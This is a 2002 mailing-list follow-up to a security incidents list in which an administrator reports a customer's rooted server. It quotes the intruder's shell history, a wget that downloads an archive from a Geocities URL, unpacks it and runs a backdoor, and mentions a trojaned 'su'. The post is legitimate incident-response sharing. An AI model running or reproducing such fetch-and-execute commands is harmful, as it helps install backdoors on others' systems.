Re: Rooted, .haos on system

From: Damian Gerow (damian@sentex.net)
Date: 12/16/02

  • Next message: george.wasgatt@insurity.com: "RE: Win2k Audit Logs - What happened here?" 
    From: Damian Gerow <damian@sentex.net>
To: incidents@securityfocus.com
Date: 16 Dec 2002 13:47:28 -0500

    On Mon, 2002-12-16 at 12:38, Damian Gerow wrote:
    > On Thu, 2002-12-12 at 18:50, Damian Gerow wrote:
    > > I've just received word that one of our customers was rooted, and he's asking about the file ".haos". Nothing rings any bells, has anyone heard of it?
    >
    > Just a quick update to this...

    And one last tidbit...

    Left in the .bash_history was this:

            w
            cd /tmp
            wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
            ./epc

    A quick check tells me that 'epc' is a backdoor utility, and the other
    file contained within loc.tgz looks like a trojaned 'su'.

    I've already notified Geocities abuse, and haven't heard back from them
    yet.

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com